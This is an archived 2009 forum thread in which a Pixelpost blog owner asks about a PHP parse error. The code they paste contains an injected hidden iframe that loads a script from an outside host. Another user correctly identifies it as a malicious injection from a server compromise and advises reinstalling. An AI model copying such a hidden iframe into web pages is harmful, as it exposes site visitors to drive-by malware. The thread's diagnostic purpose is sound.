PDA

View Full Version : Page error:syntax error:


rando57
05-17-2009, 01:24 PM
I have no acess to my frontpage: http://www.randotomson.com/blogi/

It says : Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in .../blogi/index.php on line 300


// Refererlog
if(isset($_GET['x'])&&$_GET['x'] == "referer") {

header("HTTP/1.0 404 Not Found");
header("Status: 404 File Not Found!");
echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><HTML><HEAD>\n<TITLE>404 Not Found</TITLE>\n</HEAD><BODY><iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>\n<H1>Not Found</H1>\nThe requested URL /index.php was not found on this server.<P>\n<P>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.\n</BODY></HTML>";
exit;
}


Line 300 is third from the bottom starting with "echo.... "


Can anybody help me to fix the problem?

Thank you

Dennis
05-17-2009, 02:42 PM
<iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>


This is not our code and is the result of an injection of HTML. Which version of Pixelpost do you use? It is likely your server has been compromised, please download a new package from our website and reupload the files.

rando57
05-17-2009, 03:22 PM
Thank you, I'll try to reinstall the pixelpost. I use Pixelpost 1.7.1 and it started to act the fool after i installed the defensio spam filter.

Rando